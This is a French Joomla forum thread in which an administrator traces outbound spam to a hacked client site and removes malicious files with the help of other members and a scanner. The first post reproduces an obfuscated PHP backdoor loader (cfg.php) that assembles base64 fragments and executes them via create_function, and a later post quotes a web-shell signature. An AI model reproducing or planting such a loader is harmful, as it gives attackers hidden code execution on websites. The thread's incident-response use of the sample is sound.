Spam sortant

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Spam sortant

    Bonjour,

    Suite à un mailing classique d'un client, son adresse mail s'est mise à envoyé du spam en masse.

    J'ai désactivé la fonction mail de PHP pour son abonnement dans mon plesk, ca n'a pas suffi bizarrement le spam à continué.

    Question 1 : Cela veut dire que le hacker n'utilise pas de script PHP pour envoyer des mails mais qu'il à pu avoir accès à ses logs ou y a t'il une autre explication ?

    Du coup dans un deuxième temps, j'ai changé son mot de passe, et limité les mails sortants de son domaine à 0.

    J'ai réinstallé son site à partir de la dernière sauvegarde, durant la réinstallation, pas de spam, par contre ca à repris une fois le site installé ... Coïncidence (accès aux logs), ou non (envoi par script)...

    J'ai parcouru les fichiers du site, j'ai trouvé un fichier suspect : cfg.php
    Code PHP:
    \<?php $rtpz="lKHByZWdfcmVwbGFjZShhcnJheShdgnL1teXHchd9XhdHhdNdLycsJy9ccy8nKShdwgYhdXJhdyYXkoJychdsJyhdsn"$tsdg str_replace("b","","bsbtbrb_rbebpblacbe"); $wxhw="KhdSwgam9pbhdihhcnJhehdV9zbhdGljZSgkYSwkYygkYSktMykpKSkpO2VjaG8ghdJzhdwvJy4kahdy4nPic7fQ=="$feka="hdpeyRrPSdyaXNoZXJlJhdztlhdY2hhdvICc8hdJy4kayhd4nPic7ZXhdZhbChdhiYXhdNlNjRfZGVjb2R"$asys="JGM9J2NvdWhd50JzskYT0khdX0NPT0tJRTtphdZihdhyZXNhdldhdChdgkhdYSkhd9PShddtcicgJiYhdgJGMohdJGEpPjM"$zjzy $tsdg("q""""qbaqsqeq6q4q_qdqecoqde"); $liiy $tsdg("z","","crzezatez_fzunctzizon"); $iuwt $liiy(""$zjzy($tsdg("hd"""$asys.$feka.$rtpz.$wxhw))); $iuwt(); ?>
    Malheureusement le spam à continué après suppression du fichier.

    Question 2 : Quelqu'un à une idée de ce que ce fichier peut être ?

    Question 3 : Comment puis-je scanner le site correctement ? Car les scans sur internet sont bidons.

    Je remercie d'avance celui qui voudra bien m'aider sur ce problème. Ce site a été refais récemment, sinon bien sur j'aurais réinstallé à partir d'une sauvegarde encore plus ancienne.
    Dernière édition par Minie à 04/05/2017, 10h05

  • #2
    Re : Spam sortant

    Bonjour,
    pour le scan , regarde du coté de Aesecure

    Mais pour moi, pas de doute, le fichier cfg.php n'est pas un fichier Joomla! .. et vu ce qu'il contient, ça ressemble a un Hack
    Cavo confirmera ou pas ce que je dis ... mais la 1ere chose a faire est de bloquer les scripts d'envoi de mail dans ton panel Hébergeur
    Et de nettoyer le site de fond en comble
    Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
    Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

    Commentaire


    • #3
      Re : Spam sortant

      Je confirme : ce fichier là est bien un virus. Le site doit certainement en contenir d'autres.
      Christophe (cavo789)
      Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

      Commentaire


      • #4
        Re : Spam sortant

        Merci pour vos réponses, pour le fichier, c'est bien ce que je pensais.

        J'ai déjà bloqué les scripts PHP mail sur mon serveur pour ce domaine, les spam ont continué, j'ai du descendre la limite des mails sortants à 0 en plus de la désactivation mail PHP.

        J'ai fait le Quick scan aeSecure, il me sort une erreur 500 à la fin de l’étape 3

        Commentaire


        • #5
          Re : Spam sortant

          Ok je crois que j'ai compris, il y a trop de fichier, le serveur stop le scan trop long, je fais par blocs et je reviens

          Commentaire


          • #6
            Re : Spam sortant

            J'ai fait par blocs mais certains blocs sont trop gros il me sort aussi une erreur 500

            N'y a t'il pas un moyen de fractionner encore plus ?

            Commentaire


            • #7
              Re : Spam sortant

              J'ai pu extraire 3 autres fichiers grâce au scan, tous dans le dossier includes.
              Dans l'un d'eux il y avait même une signature :
              /* xxx.php Shell Version 3 By KymLjnk */

              Comment faire pour les 2 blocs qui sont trop gros pour être scannés (erreur 500) ?
              edit: je viens de capter les option dans le menu à gauche, je recommence par paquets de 250.
              Dernière édition par Minie à 07/04/2017, 14h14

              Commentaire


              • #8
                Re : Spam sortant

                Salut.

                Je ne suis que peu connecté aujourd'hui. Oui avec le menu du gauche t'y peux paramétrer ton scan.

                Note qu'en localhost tu aurais eu moins de souci de limitation.

                Bonne soirée
                Christophe (cavo789)
                Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                Commentaire


                • #9
                  Re : Spam sortant

                  Je n'ai rien trouvé de plus dans les blocs manquants, au total 4 fichiers, j'espère qu'il n'y en a pas d'autres.

                  AeSecure a détecté un des 3 fichiers présents dans le dossier includes, ce qui m'a permis de voir les deux autres.

                  Pour le moment, aucune tentative de spam, mais c’était par vagues alors j'attends quand même en gardant les restrictions d'envoi. Je relâcherais petit à petit ma "quarantaine" on verra demain.

                  Merci en tout cas pour le tuyau je donnerais des nouvelles demain

                  Bonne soirée

                  Commentaire


                  • #10
                    Re : Spam sortant

                    Bonjour,

                    plus aucun soucis depuis que j'ai retiré les fichiers grâce au scan de Aesecure, merci

                    Commentaire


                    • #11
                      Re : Spam sortant

                      Super, merci pour ce retour d'expérience.
                      Christophe (cavo789)
                      Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                      Commentaire

                      Annonce

                      Réduire
                      Aucune annonce pour le moment.

                      Partenaire de l'association

                      Réduire

                      Hébergeur Web PlanetHoster
                      Travaille ...
                      X